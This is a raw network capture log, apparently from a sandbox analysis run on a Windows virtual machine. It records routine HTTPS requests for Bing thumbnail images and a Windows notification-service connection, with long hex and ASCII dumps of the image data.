                                                                                                                                                                                                                                                                            Data Ascii: G/+Y!+~5wVr{+#TO/ikZ3s{Efe&soi>_K.+ztI_5_vq?QwtCIR-*y6E_oRPm[XfdW2}%j'y<Lw\Qxi?j6%o
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: af df 6f d9 57 fe 23 6a 12 6b ba 4d b5 96 97 79 f6 88 ed e2 7f dd c5 2f ef a3 45 fb 9b 9f f8 ff 00 e0 1f 2d 72 96 b6 d7 76 f6 96 da 24 fa 6c d2 5d 49 27 9f 1c 72 7c 9f ba 6f e3 56 ff 00 c7 69 d1 8a 92 e6 91 32 3b af 08 eb 93 bf 88 76 59 43 69 24 12 7e f2 3b 69 7e e4 9f de 77 df f7 de 9d f1 1a 7f 10 dc 78 b2 f6 d7 57 ff 00 51 25 ef 97 65 7b 1c ae 9f f8 ed 57 b1 f0 f4 f6 97 51 ce f3 7d a2 ea 4f dd fd 8a db f7 3e 42 2a 6d 76 93 7f df f9 78 ff 00 6a 9f f1 1b fb 26 2d 6e f7 57 b2 9a 19 27 bc 93 cb f2 e5 d8 e9 e6 ff 00 79 51 5b ff 00 1f 6a c3 96 9b ab ee 84 46 68 fa 56 b5 a3 ea 16 36 5a a6 9b 69 71 69 1f ef 24 fb e9 e7 fc fb 37 fc 8d 5d d6 b1 e1 9d 26 ef c3 d7 36 bf d8 33 5c 3c 7f ea e3 97 50 7d f3 fc ff 00 ea 5d 95 b0 9b 7f db ae 23 c3 f7 d1 ea 1a 7f f6 bd d5
                                                                                                                                                                                                                                                                            Data Ascii: oW#jkMy/E-rv$l]I'r|oVi2;vYCi$~;i~wxWQ%e{WQ}O>B*mvxj&-nW'yQ[jFhV6Ziqi$7]&63\<P}]#
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: 83 c7 b1 be a1 ff 00 14 f7 83 fc bf b4 46 f1 f9 9e 57 da 66 9f fd ed fe 67 dd ff 00 3b 6b 9a f0 74 57 77 5a 84 88 96 70 f9 9e 63 c7 24 7f 3c 3f 7b f8 7e 4f 9b 6f fb b5 d9 69 df 11 a4 b5 d7 2c bf b2 f4 78 b4 a9 3c b7 8e f6 3b 68 92 14 93 fb bf f8 ee ea b5 0e 9f 61 ae ea 37 d7 5e 10 9b 50 bc be f9 3e d3 a7 6a 5f 3b ef d9 f3 7e f3 f8 db fe 05 f3 57 4d 3a 8b 0e a5 7a 7c 89 ab de ed fd ef f2 fd 0a 32 fe 19 f8 7b 56 6d 43 56 49 e6 fb 14 91 ec 83 cc b9 8a 64 48 db f8 97 b9 d8 16 ab ee 44 d7 2e 74 eb 2f 26 f2 4f b4 bf ee e5 d9 fe b7 7f fc b3 db 5d 9e 9b 67 f6 ad 5b ec 5f 6c d4 2c af a3 b6 48 ee 7f 74 f0 a5 bc bb 3e 54 46 dd f2 7b ff 00 e8 35 8f 3f 84 ec 2e 2f 24 d6 ed 75 e8 b4 6b a9 37 c9 73 e6 c4 f3 43 bb 7f cd f3 63 e6 f9 ab 0f ad a7 56 4e a3 d1 a5 6d 3f 3b 09
                                                                                                                                                                                                                                                                            Data Ascii: FWfg;ktWwZpc$<?{~Ooi,x<;ha7^P>j_;~WM:z|2{VmCVIdHD.t/&O]g[_l,Ht>TF{5?./$uk7sCcVNm?;
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16069INData Raw: 7f c0 69 d3 c1 a6 e9 57 51 a3 c3 0f da a4 8f fe 5a 4b e7 25 bb ff 00 2a 8b c4 9a 7d 86 9f ab 59 41 6b 35 dd c7 ee ff 00 d2 7e d3 17 fa b7 ff 00 65 56 a7 82 28 16 1b 67 d4 7e d7 71 1f fc b3 8e 28 bf 82 ba 79 ae 93 6f 46 05 1b 48 b5 ad 62 ee 4b a9 ec f5 0b c8 ff 00 e9 da ad 69 be 09 d6 ae ae e3 81 ec ee ed fc cf f9 69 73 17 93 ff 00 b3 56 f2 6b 57 f6 f6 b1 d9 59 59 f9 70 49 fe ae 3f 93 7c 88 bf ed 7f 72 b6 63 82 7d 57 4f fb 2b d9 dd db cf 24 6f 25 b4 97 3f ea 63 6a c2 a5 79 c3 64 97 e2 07 3d 7d e1 7d 27 4f d4 64 d3 9f 58 f3 27 8e db cc 92 3b 18 b7 fc df dd df 5c 43 de 5d d8 cd 22 5a de 5d c7 1c 9f bb 93 cb f9 3c c4 ae b7 58 b3 d4 b4 78 77 ff 00 6c 79 9f 68 ff 00 59 24 5f fc 55 67 6a 90 58 5c 69 d1 bc 90 cb fe 8f fb b9 3e cd 17 fe 84 ed fc 96 b6 a5 36 ad cf
                                                                                                                                                                                                                                                                            Data Ascii: iWQZK%*}YAk5~eV(g~q(yoFHbKiisVkWYYpI?|rc}WO+$o%?cjyd=}}'OdX';\C]"Z]<XxwlyhY$_UgjX\i>6
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: 7f 77 35 ce 27 84 7c 60 fa 7e c7 d3 7c cf b3 db 79 1f eb 77 bc 9b bf d9 fe 0a e4 bc 37 ac 5d f8 6b 50 f3 d2 18 ae 13 fd 5d cd b5 cc 49 32 48 b5 b5 3c 15 19 59 c5 f3 38 ec b7 19 d8 ea be 3a f1 2c 33 6f b2 bc d4 2d fc cf 27 cc f3 7f e5 9f f0 ed dd 56 ef 9b c4 96 50 db 69 f7 bf 6b b2 ba 92 39 a4 f3 24 f9 e1 b8 f9 f6 ab fc bf af e7 55 de 28 25 f0 cd ed 96 9f 0c 37 97 5f 67 49 3c bf b8 9b 1b fb bf ee b2 d5 2f 07 78 c7 56 d1 26 8e d6 7b c9 a4 82 3d 91 c9 65 73 fe cf fb d9 db 55 ec 23 cb 7a 71 5a 09 dd 22 dc 9a 9e b3 a5 5a c7 a0 dc ea 51 49 75 7b b2 39 24 b6 8b e7 ff 00 be ff 00 8b fc 8a 65 86 83 e1 eb 49 bc 9b ab cb bf 32 f2 3f 2e 2f b3 4b e4 ff 00 c0 bf ef aa d6 f1 35 8f 86 b5 0d 12 e7 54 d3 ec a5 b3 82 4b 6f 33 ed b1 cb e7 3c 1b be 6d ac 9f f8 e5 62 68 f2 c7
                                                                                                                                                                                                                                                                            Data Ascii: w5'|`~|yw7]kP]I2H<Y8:,3o-'VPik9$U(%7_gI</xV&{=esU#zqZ"ZQIu{9$eI2?./K5TKo3<mbh
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: b1 7c f2 4b 1f fc b1 8d bf e5 9b ed fe 2a e2 be 3a 5c ff 00 6e e9 f6 3f e9 93 49 f7 e4 b6 8e 5d 89 e5 ee fe 0f f7 86 ca 82 fb c5 57 71 6a d1 da c1 0d dd 94 9a ac 93 49 25 b7 9a 93 7d df 92 35 5d df 77 e6 fe 1a de d3 a2 ff 00 84 97 c1 16 56 ba 87 9d a8 e9 51 ef 92 e6 db ca 7d ff 00 68 fe 16 8f cb fb 8b f7 da bd 8a 18 67 85 9c 6b 4f 6f 5d bf cc 77 d0 f1 3f 0f eb d7 1a 57 88 2d b5 7d 46 cf fe 59 bc 76 d2 4b 17 c9 fd df 97 77 15 d0 68 76 70 6a 1f 69 ba 4b 3f b4 49 71 b3 f7 71 6f f2 6e 37 3f dc f9 5a a9 fc 5b d3 24 fe d6 fe ce d1 21 9a 4d 2b 4a 8f cc 8e 3f 9f f8 be 66 f9 1f f5 ad 2f 84 2b 61 69 a4 c7 ab cd 34 b6 f3 c9 73 e5 db 79 52 bc 2f 69 2f f0 3a ff 00 0e d7 ef bb f0 af a1 ad 28 bc 3a af 15 ef 3b 69 f9 7a 08 ed 3c 09 e1 ed 32 d3 50 b9 d4 75 7f 15 69 ff 00
                                                                                                                                                                                                                                                                            Data Ascii: |K*:\n?I]WqjI%}5]wVQ}hgkOo]w?W-}FYvKwhvpjiK?Iqqon7?Z[$!M+J?f/+ai4syR/i/:(:;iz<2Pui


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
10          192.168.2.6  49746        150.171.27.10   443
Timestamp                Bytes transferred  Direction  Data
2024-12-27 06:09:23 UTC  346                OUT        GET /th?id=OADD2.10239360172384_1T8ZHTG4V2CH7K983&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-12-27 06:09:23 UTC  854                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 482575
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: E3FF3C1B66A74F9A98D31FA38651F44C Ref B: EWR30EDGE1119 Ref C: 2024-12-27T06:09:23Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:22 GMT
                                                                                                                                                                                                                                                                            Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
11          192.168.2.6  49749        150.171.27.10   443

Timestamp  Bytes transferred  Direction  Data
2024-12-27 06:09:23 UTC  375  OUT  GET /th?id=OADD2.10239360172398_1SAKF1TLLO2IFUJXJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-27 06:09:23 UTC  861  IN  HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 533370
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
X-Cache: CONFIG_NOCACHE
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 6BB23E864FE84733B0F0C3363023468C Ref B: EWR30EDGE1410 Ref C: 2024-12-27T06:09:23Z
Date: Fri, 27 Dec 2024 06:09:23 GMT
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port
12          192.168.2.6  49748        20.198.118.190  443

Timestamp  Bytes transferred  Direction  Data
2024-12-27 06:09:24 UTC  71  OUT
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: xqoGnGOEAUmC2gd/.1Context: 7fe07fe05dcc6265
2024-12-27 06:09:24 UTC  249  OUT
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-27 06:09:24 UTC  1084  OUT
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: xqoGnGOEAUmC2gd/.2Context: 7fe07fe05dcc6265<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
2024-12-27 06:09:24 UTC  74  OUT
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: xqoGnGOEAUmC2gd/.3Context: 7fe07fe05dcc6265
2024-12-27 06:09:24 UTC  14  IN
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
2024-12-27 06:09:24 UTC  58  IN
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: FSvrzYpzukaq05oQ9BfuIQ.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49753 | 150.171.27.10 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:25 UTC | 346 | OUT | GET /th?id=OADD2.10239381876013_1OYVEM6EQRGLI15B8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-12-27 06:09:25 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 521585
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: CC6A939809F84BB9B7BCD391D47BB0BD Ref B: EWR30EDGE0909 Ref C: 2024-12-27T06:09:25Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:25 GMT
                                                                                                                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49757 | 150.171.27.10 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:26 UTC | 375 | OUT | GET /th?id=OADD2.10239381876014_1KDTTK12P9PNFN49Z&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-12-27 06:09:26 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 577100
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 5A6A5E0C32DE49A1835627048CE7B764 Ref B: EWR30EDGE0317 Ref C: 2024-12-27T06:09:26Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:26 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Data Ascii: zN2l_y0t&8vhn=kOKs5Uue;QkN({uNb(5ZClED2@4A_.Q N5xh].mRoVxPyNS{O/t-]Tle)&$<U?1QWx-yzR)
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: 76 b6 e5 60 79 04 11 d6 99 25 f5 cb c2 b1 09 59 a3 66 cf 94 cc 59 73 f4 a5 ec d4 ed 28 3d 0d 23 1e 56 d3 24 9a 37 83 fd 22 25 db 0c 8d 86 f9 b7 6d fc 3d 2b 6a 3f 0e 6a fa af 87 db 55 b2 81 65 b6 8d be 65 59 0b 4d 8e ed b0 64 ed 1e b5 17 87 6c 9e e2 d5 8d e7 9b 6d 6e cd 86 65 8f 73 30 fc 70 3d ba d7 75 e1 2d 0a fc e8 3a bd ef 87 f4 f6 bc 8a da 3f dd c9 c7 da 54 0e bb 55 4e 76 f3 cf ad 70 e3 71 7e c2 37 ba 4e eb 7d 8d a8 52 55 27 6e 87 35 e0 dd 26 ce d1 62 3a 86 95 77 2d d5 c4 83 ca 65 93 cb dc 09 fe eb a9 c7 4e b8 ac ef 1c da e9 d6 be 22 ff 00 44 be b9 91 d7 77 99 1c b1 a7 fa 39 cf 0a ac 84 87 5f 71 5d 85 8f 89 a4 bd d5 ad ae b5 0b 69 2e 96 ce 33 f6 4b 4e 19 57 27 f8 cf 1d fd 2a 9f 8f ad 6c 3c 4d ab 5b 5e e8 d6 7f 61 f3 ee 48 b9 82 4c 0f 32 43 8c b4 64 0c
                                                                                                                                                                                                                                                                            Data Ascii: v`y%YfYs(=#V$7"%m=+j?jUeeYMdlmnes0p=u-:?TUNvpq~7N}RU'n5&b:w-eN"Dw9_q]i.3KNW'*l<M[^aHL2Cd
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: 53 7c 5d a7 cb a9 5b c5 ab c9 e2 38 7e c7 3a 87 bd 8b ed 21 16 1f 2f 0a 4a 80 09 2d b4 ff 00 09 15 cb fc 0a f1 55 d5 97 81 53 4c b8 bb d3 f5 00 b7 7b 20 d3 ee ed b7 c7 0f 98 7e 52 64 ed 9f 4e a2 b7 3e 26 45 a1 5a c7 2c 9e 25 b1 b6 93 55 b9 b2 1f 66 bd d2 d8 2c 9b d5 f0 53 6b 0c 6e 3d 33 c9 61 59 d4 c0 53 c1 66 6e 95 28 b4 ee ed b4 b4 bf 44 d2 b2 57 d4 21 8a 9d 6a 17 94 8b 7a 0e ad a2 e9 fa 85 a6 85 25 a4 31 59 cb e5 48 d2 5f 5d 9b 95 b8 7e 4e e9 1c 30 08 c3 a8 53 cf 61 de bd 57 54 b1 d2 e4 d3 63 bb 30 2f 93 a7 c9 e6 44 b1 4e 64 58 c1 c8 dc ae a4 32 a9 ef cf 02 bc 57 e0 2d de 9f 73 35 e5 bd bd 8e a9 6d 07 9a 52 ef e6 89 2e 23 4c e5 77 46 41 2e 41 ee 07 18 e9 5d 4d f6 bf 71 e1 1f 12 49 61 ab c1 a4 ff 00 c2 3f a8 6e 0c d1 e1 16 64 38 23 7a 33 02 ac 06 72 00
                                                                                                                                                                                                                                                                            Data Ascii: S|][8~:!/J-USL{ ~RdN>&EZ,%Uf,Skn=3aYSfn(DW!jz%1YH_]~N0SaWTc0/DNdX2W-s5mR.#LwFA.A]MqIa?nd8#z3r
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: d2 7d 8b cc d8 b1 b8 fb ad e6 72 57 3f dd f4 ef 5c 3f c4 4d 6b 53 bf f1 54 97 62 f2 da 53 1f dd 9e d2 41 b5 b0 31 b8 36 01 e9 5c f2 98 a1 dd 0c 5d 36 fc ad 27 f9 ef 53 e9 fa 4e a7 7b 1e 20 8a 49 7a ed 8d 54 b7 4a db 0f 80 a7 86 a8 ea 39 b7 d3 5b 7e 64 54 c7 4e b4 39 14 6d e8 74 9f 0b 2f b4 8d 0f 56 6b 9d 52 cf ed c6 78 c8 fd dc 9b 1a dc 1e 19 b7 60 9e 87 b5 7a df 86 3e 19 7c 29 ba b3 68 a7 5d 42 79 6e a3 52 d7 2b 7a 44 70 83 d1 a3 60 a0 03 db 69 cd 79 3f 80 f5 6b cf 0d c9 1c a9 2d b4 ec b9 32 e9 f7 31 87 56 3e a5 58 63 8f ad 7a b7 83 7e 21 1b 2f 03 cb 73 a8 78 4e 49 4c 53 84 93 ec 91 a4 2a a5 cf cb fb be 3e 53 ec 0d 7c 8f 14 43 32 93 e6 c1 39 2d 97 bb 2b 5f e4 fb 1d 99 74 63 2f 76 ae cb ba 2f 78 a3 c0 3a 37 86 74 9b cb 7d 05 af 23 d3 e2 80 f9 ac cb f6 96
                                                                                                                                                                                                                                                                            Data Ascii: }rW?\?MkSTbSA16\]6'SN{ IzTJ9[~dTN9mt/VkRx`z>|)h]BynR+zDp`iy?k-21V>Xcz~!/sxNILS*>S|C29-+_tc/v/x:7t}#
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16067INData Raw: da 2c 5f 34 ec 99 da bb 1c 67 3d f3 c9 ed 51 f8 d3 c4 57 1e 16 f0 9b f8 4e 5d 41 75 09 2e 60 f2 ef 20 9e 49 37 e3 3d 1c bf dc 6d be 99 cd 78 6c de 2a d6 2e 34 d8 e3 fe d5 91 62 8b e7 6b 6d c5 97 23 bf d7 f9 55 0d 5a f7 51 bc b3 8f 58 b8 82 76 85 98 c7 e7 c8 a5 91 8a f6 2f d3 23 eb 59 53 e1 87 2a 91 78 a9 c5 c5 3b a5 6b 6b d0 af ed 17 6f 75 3b d8 f6 cf 06 78 df fe 11 1f 04 c4 e9 06 97 24 5f 32 2a c9 6c 36 cd ed 94 5f 97 1e e4 9a e9 fe 20 68 f7 3e 3b f0 0c 3a a6 a1 7d 6d 13 ca d1 b4 11 c4 a5 2d 6d cf f1 3c e3 19 73 8e 01 e4 0f 4e 6b c5 7e 1b eb d2 eb 57 56 da 14 f6 36 91 da c7 f7 5b 6e e6 f3 1b e5 07 be 73 f4 af 78 f1 fe 93 a4 f8 5b e0 cc 9a 44 12 47 6b 7d 3c 45 3e c9 7b bc ad c6 4e 79 f9 5b 67 cd cf 05 57 e9 5e 0e 79 46 9e 07 30 a0 a9 fb b5 a7 3d f7 d3 f4
                                                                                                                                                                                                                                                                            Data Ascii: ,_4g=QWN]Au.` I7=mxl*.4bkm#UZQXv/#YS*x;kkou;x$_2*l6_ h>;:}m-m<sNk~WV6[nsx[DGk}<E>{Ny[gW^yF0=
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: 2c ea fe 22 f0 0c 5a 5c 51 43 a7 db 23 0f 36 da ca 11 1a 48 79 f9 9b a9 2d cf ad 7a b8 3c 93 1d 53 31 a5 8c be 89 db de 5a ab f9 e9 f2 d3 43 1c 4d 6c 15 1a 32 a7 39 eb d6 df a5 ae 2f c2 9f 85 3a d6 a7 63 3d ec 97 d2 d9 c7 6a db e2 f3 18 2c 73 0f e3 01 f7 7c a7 68 38 f5 af 4a f0 2c be 15 d1 b5 ab 8d 67 56 d7 a7 b7 b5 4b 66 32 69 97 bb be d9 72 15 80 5f 2f 1f 26 dc 71 9c fa fa 57 cd 7a 0f 88 75 5b 58 67 b6 8a fa e5 61 9f 3e 64 7e 61 da d9 ef 8f 5a 6d d5 e4 f2 49 19 79 19 bc b5 c2 ee 6d dc 57 d9 62 b2 4a f8 99 cb db 54 f7 7c 91 e4 e1 b3 8c 25 2a 4b d9 41 df cd 9f 45 1f 8c 9a 24 76 f7 56 fe 17 d3 67 81 d7 cc 4b 68 a5 90 3c 4b bb 3c fa ff 00 c0 7a 57 8e ea 97 fa a6 a3 a9 29 bd bc 96 72 b2 13 fb c9 0b 6d c9 c9 c7 a7 35 93 e1 32 cd 79 91 f2 9d d9 ae b2 df 4f dd
                                                                                                                                                                                                                                                                            Data Ascii: ,"Z\QC#6Hy-z<S1ZCMl29/:c=j,s|h8J,gVKf2ir_/&qWzu[Xga>d~aZmIymWbJT|%*KAE$vVgKh<K<zW)rm52yO
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: 1a 6d e5 fc 57 26 19 52 c6 7f 33 6f fb 41 f1 c8 35 c2 ac 92 bd d6 e0 bf f7 cd 2d c9 95 26 de 77 7f c0 aa 5e 5d 37 53 de 92 e5 7b ab 2d 7e 61 fd ab 86 f6 4d 46 9e bd 1d de 9f 23 d0 fe 1d f8 d6 58 75 68 ec b5 8d 71 6d ac 24 65 92 59 20 b6 32 3c 87 d1 b2 46 71 d7 19 02 bb 8d 5b e2 96 91 67 6f 2c 96 d7 da b3 dc 2c eb 1b 6d 54 56 68 94 93 bc 1c 9e 4f cb c1 e0 7b d7 83 5a ca 3c ce 56 b5 21 06 55 60 9f c5 c3 7f b5 5c 38 ce 1e c1 d7 aa aa 54 87 c8 e8 c2 67 52 84 1c 62 95 fc ce 9b c6 1e 31 83 50 d3 fe c5 6d 79 ab 5d 69 6b 26 f8 e2 d4 2e 77 ed 90 e4 f4 5e 3a 93 4b f0 0f c7 d7 9e 07 f1 f4 77 96 d3 c1 15 b5 d4 4d 04 f1 cf 07 99 1e 1b 8d db 32 32 c3 de b9 fb 1d 20 98 65 89 fe ec 8b 95 5f e5 59 ab 62 12 e2 40 fd 56 bb a9 e0 f0 aa 84 a8 45 68 ce 7a 98 ec 4f b5 8d 54 95
                                                                                                                                                                                                                                                                            Data Ascii: mW&R3oA5-&w^]7S{-~aMF#Xuhqm$eY 2<Fq[go,,mTVhO{Z<V!U`\8TgRb1Pmy]ik&.w^:KwM22 e_Yb@VEhzOT


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
15          192.168.2.6  49767        150.171.27.10   443
Timestamp                Bytes transferred  Direction  Data
2024-12-27 06:09:29 UTC  346                OUT        GET /th?id=OADD2.10239360433145_1P8I9JAN4TGEHJX5M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-12-27 06:09:30 UTC  854                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 482331
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
